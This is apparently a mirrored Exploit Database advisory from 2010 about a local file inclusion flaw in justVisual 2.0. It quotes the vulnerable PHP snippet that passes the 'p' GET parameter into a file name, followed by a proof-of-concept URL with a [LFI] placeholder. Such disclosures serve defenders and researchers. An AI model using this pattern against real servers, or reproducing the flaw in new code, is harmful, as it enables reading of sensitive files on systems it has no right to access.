justVisual 2.0 – ‘index.php’ Local File Inclusion

• Exploit Database
• 137 阅读

• 作者： eidelweiss
  日期： 2010-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11876/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  ######################################################################### justVisual 2.0 (index.php) <= LFI Vulnerability #########################################################################   [+]Title: justVisual 2.0 (index.php) Local File Vulnerability [+]Version: 2.0 [+]License: http://www.gnu.org/copyleft/gpl.html [+]Download: http://fh54.de/justVisual/packages/justVisual2.zip [+]Risk: Medium [+]Local: Yes [-]Remote: No   ########################################################### [!]Author:eidelweiss [!]Contact: eidelweiss[at]cyberservices[dot]com [!]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) [!]Special: [D]eal [C]yber - syabilla_putri (miss u) & all my friends ###########################################################   -=[ VULN CODE ]=-   $selfname=basename($_SERVER[&apos;PHP_SELF&apos;],&apos;.php&apos;); if(isset($_GET[&apos;p&apos;]) && !empty($_GET[&apos;p&apos;])) { //$selfname=basename($_GET[&apos;p&apos;],&apos;.php&apos;); $selfname=str_replace(&apos;.php&apos;,&apos;&apos;,$_GET[&apos;p&apos;]);     -=[ P0C ]=-   Http://127.0.0.1/index.php?p=[LFI]   ###############################=[E0F]=###################################